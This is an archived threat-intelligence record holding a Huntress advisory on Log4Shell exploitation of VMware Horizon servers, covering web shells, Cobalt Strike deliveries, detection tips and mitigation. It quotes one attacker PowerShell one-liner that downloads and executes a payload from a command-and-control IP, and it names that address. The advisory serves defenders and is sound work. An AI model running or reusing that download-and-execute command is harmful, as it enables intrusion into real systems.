{ "id": "88e74f56-30a9-427c-8da1-82b80eb34e76", "created_at": "2026-04-06T00:21:24.51623Z", "updated_at": "2026-04-10T13:11:53.059914Z", "deleted_at": null, "sha1_hash": "c326431297cd0ddc9ec1000d507bc1b19e417e65", "title": "VMware Horizon Servers Actively Being Hit With Cobalt Strike | Huntress", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 42700, "plain_text": "VMware Horizon Servers Actively Being Hit With Cobalt Strike |\r\nHuntress\r\nArchived: 2026-04-05 17:40:32 UTC\r\nOn January 5, the UK’s National Health Service (NHS) alerted that hackers were actively targeting Log4Shell\r\nvulnerabilities in VMware Horizon servers in an effort to establish persistent access via web shells. These web\r\nshells allow unauthenticated attackers to remotely execute commands on your server as NT\r\nAUTHORITY\\SYSTEM (root privileges). According to Shodan, ~25,000 Horizon servers are currently internet\r\naccessible worldwide.\r\nOur team is continuing to track this activity and this post will be updated with new information as it becomes\r\navailable.\r\nImage Source: NHS - https://digital.nhs.uk/cyber-alerts/2022/cc-4002\r\nBased on Huntress’ dataset of 180 Horizon servers, we’ve validated NHS’ intel and discovered 10% of these\r\nsystems (18) had been backdoored with a modified absg-worker.js web shell. It’s important to note that ~34% of\r\nthe 180 Horizon servers (62) we analyzed were unpatched and internet-facing at the time of this publication. the\r\nweb shells on these 18 compromised systems established a timeline that started on December 25, 2021 and\r\ncontinued until December 29, 2021.\r\nNew Behavior\r\nOn January 14 at 1458 ET, an unrelated Managed Antivirus detection (Microsoft Defender) tipped our ThreatOps\r\nteam to new exploitation of the Log4Shell vulnerability in VMware Horizon. This time it was used to deliver the\r\nCobalt Strike implant.\r\nAdditional security researchers including TheDFIRReport and Red Canary reported similar behavior around the\r\nsame time—confirming a PowerShell based downloader executed a Cobalt Strike payload that was configured to\r\ncall back to 185.112.83[.]116 for command and control.\r\niex ((New-Object http://System.Net.WebClient).DownloadString('http://185.112.83[.]116:8080/drv'))\r\nAt 1938 ET, we started deploying Huntress’ soon-to-be-released Process Insights agent to all of the VMware\r\nHorizon servers we protect. This new EDR capability is based on an acquisition we made in early 2021 and allows\r\nus to proactively detect and respond to non-persistent malicious behavior by giving us the ability to collect\r\ndetailed information about processes.\r\nInitial Access Source\r\nDespite mass exploitation of VMware Horizon to deliver web shells, our data suggests today's Cobalt Strike\r\ndeployments were exploitation of Horizon itself and not the abuse of web shells. This conclusion is largely based\r\nhttps://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike\r\nPage 1 of 2\n\non analysis of the PowerShell payload's parent process where web shell abuse spawns from node.exe while\r\nexploitation of Log4Shell in Horizon spawns from ws_tomcatservice.exe as pictured.\r\nDetection Tips\r\nFor those of you just learning about the mass exploitation of VMware Horizon servers and the installation of\r\nbackdoor web shells, you should seriously consider the possibility that your server is compromised if it was\r\nunpatched and internet-facing. To help you determine your status,\r\nwe strongly suggest you perform the following actions:\r\nRun VMware’s Horizon Mitigation tool to report whether there is a vulnerable Log4J library or\r\nchild_process based web shell present under the installation location with the following command:\r\nHorizon_Windows_Log4j_Mitigation.bat /verbose\r\nManually inspect/assess the files within %ProgramFiles%\\VMware\\VMware\r\nView\\Server\\appblastgateway\\ for the presence of the child_process string as pictured here.\r\nReview historical records for evidence of node.exe or ws_TomcatService.exe spawning abnormal\r\nprocesses to include PowerShell.\r\nMitigation Steps\r\nThis new wave of coordinated hacking emphasizes the criticality of patching these servers immediately. VMware\r\nhas produced detailed guidance to help you address these security vulnerabilities.\r\nShould you discover a web shell, VMware recommends you “take down the system and engage [an] Incident\r\nResponse Team” to fully assess the compromise. Alternatively, Huntress recommends you restore from a backup\r\nprior to December 25 to remove the web shell. With that said, it’s entirely possible attackers exploited CVE-2021-\r\n44228 and CVE-2021-45046 to spread laterally within your network so you should proceed with caution.\r\nSource: https://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike\r\nhttps://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike\r\nPage 2 of 2", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike" ], "report_names": [ "cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434884, "ts_updated_at": 1775826713, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c326431297cd0ddc9ec1000d507bc1b19e417e65.pdf", "text": "https://archive.orkl.eu/c326431297cd0ddc9ec1000d507bc1b19e417e65.txt", "img": "https://archive.orkl.eu/c326431297cd0ddc9ec1000d507bc1b19e417e65.jpg" } }